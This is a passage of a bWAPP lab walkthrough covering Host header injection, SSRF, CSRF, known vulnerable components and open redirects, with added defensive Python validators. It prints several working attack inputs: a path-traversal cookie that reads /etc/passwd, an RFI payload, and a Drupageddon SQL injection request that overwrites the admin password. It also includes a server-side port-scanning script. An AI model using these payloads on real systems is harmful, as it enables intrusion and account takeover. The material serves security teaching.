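Both Host header exercises have the same root cause: the application builds absolute URLs (the reset link, cached pages) from whatever `Host` the client sent. The Python example below (added here; not bWAPP code) shows the vulnerable construction next to the fix: the canonical origin comes from configuration, and the incoming `Host` is normalised and checked against an allow-list before the request is served at all. `CANONICAL_ORIGIN`, `ALLOWED_HOSTS` and the `bwapp.example` names are assumptions for the demonstration.

```python
# Assumptions: both values come from server configuration, never from the request.
CANONICAL_ORIGIN = "https://bwapp.example"
ALLOWED_HOSTS = {"bwapp.example", "www.bwapp.example"}


def normalize_host(host_header):
    """Lower-case, strip any port and trailing dot; '' for a missing header."""
    if not host_header:
        return ""
    host = host_header.strip().lower()
    if host.startswith("["):                     # IPv6 literal such as [::1]:8080
        host = host.split("]", 1)[0] + "]"
    else:
        host = host.split(":", 1)[0]
    return host.rstrip(".")


def host_is_trusted(host_header):
    """Exact match against the allow-list; no suffix or substring matching."""
    return normalize_host(host_header) in ALLOWED_HOSTS


def build_reset_link_vulnerable(token, host_header):
    """What the write-up observed: the link is assembled from the request's Host."""
    return f"http://{host_header}/reset.php?token={token}"


def build_reset_link(token, host_header):
    """Refuse untrusted Host values, then build the link from configuration only,
    so the e-mailed link (and anything a cache stores) cannot name another host."""
    if not host_is_trusted(host_header):
        raise ValueError(f"untrusted Host header: {host_header!r}")
    return f"{CANONICAL_ORIGIN}/reset.php?token={token}"


if __name__ == "__main__":
    print(build_reset_link_vulnerable("tok", "10.0.0.5"))   # link points at the attacker's host
    print(build_reset_link("tok", "bwapp.example"))          # link always points at the canonical origin
```

The same `host_is_trusted()` gate, applied before any response is generated, is what prevents the cache-poisoning variant: a request for an unknown host gets an error page, not a cacheable page with attacker-chosen links.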
Local File Inclusion (SQLiteManager)
No bee-box available for now.
```http
GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted
```
Exploit reference: https://www.securityfocus.com/bid/22727/exploit
Remote & Local File Inclusion (RFI/LFI)
payload:
rlfi.php?language=http://www.baidu.com&action=go
Restrict Device Access
A specific device is required, so just change the User-Agent header.
Restrict Folder Access
low: the folder can be accessed freely;
in the other levels .htaccess restricts it and it can no longer be accessed.
Server Side Request Forgery (SSRF)
Detailed SSRF write-up:
https://blog.csdn.net/u010726042/article/details/77806775
bWAPP's own SSRF port-scanning script:
```php
<?php
/*
bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.
Enjoy!
Malik Mesellem
Twitter: @MME_IT
© 2013 MME BVBA. All rights reserved.
*/
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";
if(isset($_REQUEST["ip"]))
{
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    $results = array();
    foreach($ports as $port)
    {
        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {
            $results[$port] = true;
            fclose($pf);
        }
        else
        {
            $results[$port] = false;
        }
    }
    foreach($results as $port=>$val)
    {
        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";
        if($val)
        {
            echo "<span style=\"color:green\">OK</span><br/>";
        }
        else
        {
            echo "<span style=\"color:red\">Inaccessible</span><br/>";
        }
    }
}
?>
```
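The script above connects to whatever `ip` and port it is told to, which is exactly the capability an SSRF hands to an attacker: the server's own network position. The Python example below (added here; not bWAPP code) is the validation a server-side fetcher should run before opening any connection: only `http`/`https`, only expected ports, and every address the host resolves to must be a public one, so loopback, RFC 1918, link-local (including the cloud metadata range) and IPv6 equivalents are refused. The resolver is injected so the check runs offline here with a constructed DNS table; `validate_fetch_target` and `is_allowed` are this example's own names.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed DNS table used instead of a real lookup for the demonstration.
FAKE_DNS = {
    "intranet.example": ["10.0.0.5"],
    "www.public.example": ["93.184.216.34"],
}


def fake_resolve(hostname):
    return FAKE_DNS.get(hostname, [])


def is_public_ip(addr):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_target(url, resolve):
    """Return (scheme, host, port, addresses) for a URL that passes every
    check, or raise ValueError. The caller should connect to one of the
    returned addresses rather than re-resolving, to avoid DNS rebinding."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    try:
        addresses = [str(ipaddress.ip_address(host))]   # literal IP, no lookup
    except ValueError:
        addresses = resolve(host)
    if not addresses or not all(is_public_ip(a) for a in addresses):
        raise ValueError(f"host resolves to a non-public address: {addresses}")
    return parts.scheme, host, port, addresses


def is_allowed(url, resolve=fake_resolve):
    try:
        validate_fetch_target(url, resolve)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for u in ("https://www.public.example/api", "http://intranet.example/",
              "http://127.0.0.1:80/", "http://169.254.169.254/latest/meta-data/"):
        print(u, is_allowed(u))
```

Note that the page's scanner takes an IP and a fixed port list; the same validator applied to its `ip` parameter would refuse every internal target, which removes the port-scan-through-the-server behaviour the exercise demonstrates.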
XML External Entity Attacks (XXE)
http://www.youknowi.xin/xxe%e6%94%bb%e5%87%bb/
/ A8 - Cross-Site Request Forgery (CSRF) /
Detailed explanation:
https://www.cnblogs.com/wangyuyu/p/3388169.html
Cross-Site Request Forgery (Change Password)
Cross-Site Request Forgery (Change Secret)
Cross-Site Request Forgery (Transfer Amount)
/ A9 - Using Known Vulnerable Components /
Using components with known vulnerabilities.
Buffer Overflow (Local)
Local buffer overflow.
(bee-box only) Not installed yet.
Drupal SQL Injection (Drupageddon)
```http
POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
```
Test request.
Heartbleed Vulnerability
(CVE-2014-0160)
Heartbleed, too well known to need an introduction.
PHP CGI Remote Code Execution
bee-box only.
PHP Eval Function
phpMyAdmin BBCode Tag XSS
CVE-2016-9862
Affected versions:
phpMyAdmin 4.6.x
Shellshock Vulnerability (CGI)
SQLiteManager Local File Inclusion
SQLiteManager PHP Code Injection
SQLiteManager XSS
/ A10 - Unvalidated Redirects & Forwards /
Unvalidated Redirects & Forwards (1)
Unvalidated redirects and forwards (since removed from the Top 10).
The login page redirects after login, so we can capture and modify the request to send the user to a phishing site of our choice.
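The fix for the redirect above is to treat the target as untrusted data and only follow it if it is a same-site path, or a host on an explicit allow-list. The Python example below (added here; not bWAPP code) implements that check and handles the usual evasions: protocol-relative `//evil`, backslash variants, absolute URLs and non-HTTP schemes such as `javascript:`. The `www.bwapp.example` allow-list entry and the function name are assumptions for the demonstration.

```python
from urllib.parse import urlsplit


def safe_redirect_target(target, allowed_hosts=(), default="/"):
    """Return `target` if it is safe to redirect to, otherwise `default`.

    Safe means: an absolute path on this site (starts with a single '/'),
    or an https URL whose host is in `allowed_hosts`. Everything else,
    including protocol-relative and javascript: URLs, falls back."""
    if not target:
        return default
    target = target.strip()
    # Browsers treat backslashes in the authority position as slashes,
    # so normalise before parsing rather than after.
    candidate = target.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative: only a listed https host is acceptable.
        if parts.scheme == "https" and parts.hostname in allowed_hosts:
            return candidate
        return default
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    return candidate


if __name__ == "__main__":
    for t in ("/portal.php", "//attacker.test/", "http://attacker.test/",
              "/\\attacker.test", "javascript:alert(1)", "https://www.bwapp.example/x"):
        print(repr(t), "->", safe_redirect_target(t, allowed_hosts={"www.bwapp.example"}))
```

An even simpler design avoids the parameter entirely: store the post-login destination server-side in the session and redirect to that, so there is nothing in the request to tamper with.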
Unvalidated Redirects & Forwards (2)
/ Other bugs... /
ClickJacking (Movie Tickets)
Client-Side Validation (Password)
Client-side bypass: set a weak password.
Since the check runs on the client it is easy to get around: remove the onsubmit handler in the page source, or delete the JavaScript from the response; this bypasses the restriction and lets us set a simple password.
HTTP Parameter Pollution
href=hpp-3.php?movie=1&name=meetsec&movie=2&action=vote
HTTP parameter pollution was introduced earlier; every browser handles the duplicated part differently.
Here the vote goes to movie 2, as if movie 1 had never been submitted.
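The vote going to movie 2 is the "last value wins" rule of PHP's query parsing; other platforms keep the first value or both. The Python example below (added here; not bWAPP code) parses the page's own URL three ways, first-wins, last-wins and strict, and shows the strict variant rejecting the request because `movie` appears twice. Function names are this example's own.

```python
from urllib.parse import parse_qsl, urlsplit

# The page's polluted link, used as the sample input.
POLLUTED_URL = "hpp-3.php?movie=1&name=meetsec&movie=2&action=vote"


def query_pairs(url):
    """All name/value pairs in order, blanks kept, duplicates preserved."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def last_wins(url):
    """PHP/$_GET behaviour: a later duplicate overwrites the earlier one."""
    return dict(query_pairs(url))


def first_wins(url):
    """Behaviour of platforms that keep the first occurrence."""
    return {k: v for k, v in reversed(query_pairs(url))}


def parse_query_strict(url):
    """Return (params, duplicates): params holds single-valued names only,
    duplicates maps each repeated name to every value it carried."""
    params, duplicates = {}, {}
    for name, value in query_pairs(url):
        if name in params:
            duplicates.setdefault(name, [params[name]]).append(value)
        elif name in duplicates:
            duplicates[name].append(value)
        else:
            params[name] = value
    for name in duplicates:
        params.pop(name, None)
    return params, duplicates


def vote_params(url):
    """Handler-side check: refuse the request if any parameter is repeated,
    so the server never has to guess which copy the client meant."""
    params, duplicates = parse_query_strict(url)
    if duplicates:
        raise ValueError(f"duplicated parameters: {sorted(duplicates)}")
    return params


if __name__ == "__main__":
    print(last_wins(POLLUTED_URL)["movie"], first_wins(POLLUTED_URL)["movie"])
    print(parse_query_strict(POLLUTED_URL))
```

Rejecting duplicates at the boundary is cheap and removes the class of bugs where a proxy, a WAF and the application each pick a different copy of the same parameter.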
HTTP Response Splitting
HTTP response splitting attack.
HTTP Verb Tampering
HVT, HTTP verb tampering: changing the request method (GET, POST, TRACE, PUT, MOVE, DELETE, and so on).
Sometimes switching the method is enough to get past a WAF,
or, when building a CSRF PoC, if this flaw is present the parameters can be submitted directly in the URL, so a single click triggers it.
Information Disclosure - Favicon
Information disclosure: the page icon can sometimes reveal which web framework is in use.
Information Disclosure - Headers
This exercise shows that response headers leak server details, which an attacker can use to look for matching vulnerabilities;
either suppress the banner or obfuscate it.
Information Disclosure - PHP version
Information Disclosure - Robots File
robots.txt leaks sensitive paths of the site.
Insecure iFrame (Login Form)
Insecure login form.
Unrestricted File Upload
Unrestricted upload:
there is no restriction on the file extension at all.
--------------------------- Extras --------------------------
A.I.M. - No-authentication Mode
No-authentication mode.
Client Access Policy File
Client access policy file:
clientaccesspolicy.xml is Microsoft's cross-domain policy file specific to Silverlight.
Cross-Domain Policy File
Cross-domain policy file.
A cross-domain policy file is an XML document that grants web clients (such as, but not limited to, Adobe Flash Player or Adobe Acrobat) permission to handle data across domains.
How the cross-domain policy file is configured:
When a server wants to access a server in another domain it needs cross-domain access; for that to succeed the target server must grant permission, and that permission setting is the whole purpose of the cross-domain policy file (crossdomain.xml).
allow-access-from: authorises the requesting domain to read data from the target; * grants access to any domain.
Evil 666 Fuzzing Page
Fuzzing:
https://www.freebuf.com/column/157277.html
Manual Intervention Required!
Manual CAPTCHA intervention (presumably).
Unprotected Admin Portal
(Unprotected admin portal.)
We Steal Secrets... (html)
We found that the password is displayed as soon as you log in.
We Steal Secrets... (plain)
WSDL File (Web Services/SOAP)
SOAP web services:
https://blog.csdn.net/LoveCarpenter/article/details/53945697